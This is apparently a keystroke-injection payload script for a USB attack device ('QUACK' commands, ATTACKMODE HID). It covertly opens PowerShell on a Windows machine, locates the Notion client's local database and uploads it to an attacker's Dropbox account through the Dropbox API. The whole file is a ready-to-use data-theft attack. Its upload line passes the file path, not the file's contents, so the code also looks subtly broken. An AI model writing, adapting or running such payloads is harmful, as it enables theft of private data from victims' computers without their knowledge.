#########################################################################
#                                                                       #
# Title        : Exfiltrates the entire database of the Notion client   #
# Author       : Aleff                                                  #
# Version      : 1.0                                                    #
# Category     : Exfiltration                                           #
# Target       : Windows 10-11                                          #
#                                                                       #
#########################################################################

ATTACKMODE HID

# Requirements:
# - Notion must be installed
# - Internet Connection

# VARIABLES
# You must define your Dropbox accessToken or modify the exfiltration modality.
DROPBOX_ACCESS_TOKEN='example'

QUACK DELAY 1500
QUACK GUI r
QUACK DELAY 1000
QUACK STRING PowerShell
QUACK ENTER
QUACK DELAY 2000

# Settings about Notion DB
QUACK STRING \$NotionPath = Join-Path -Path \$env:APPDATA -ChildPath 'Notion'
QUACK ENTER
QUACK DELAY 500
QUACK STRING \$NotionDatabasePath = Join-Path -Path \$NotionPath -ChildPath 'notion.db'
QUACK ENTER
QUACK DELAY 500
QUACK STRING \$uploadUrl = 'https://content.dropboxapi.com/2/files/upload'
QUACK ENTER
QUACK DELAY 500
QUACK STRING \$dropboxFilePath = '/notion.db'
QUACK ENTER
QUACK DELAY 500
QUACK STRING \$headers = @{}
QUACK ENTER
QUACK DELAY 500
QUACK STRING \$headers.Add('Authorization', 'Bearer $DROPBOX_ACCESS_TOKEN')
QUACK ENTER
QUACK DELAY 500
QUACK STRING \$headers.Add('Dropbox-API-Arg', '{\"path\":\"' + \$dropboxFilePath + '\",\"mode\":\"add\",\"autorename\":true,\"mute\":false}')
QUACK ENTER
QUACK DELAY 500
QUACK STRING \$headers.Add('Content-Type', 'application/octet-stream')
QUACK ENTER
QUACK DELAY 500
QUACK STRING Invoke-RestMethod -Uri \$uploadUrl -Headers \$headers -Method Post -Body \$NotionDatabasePath; exit;
QUACK ENTER
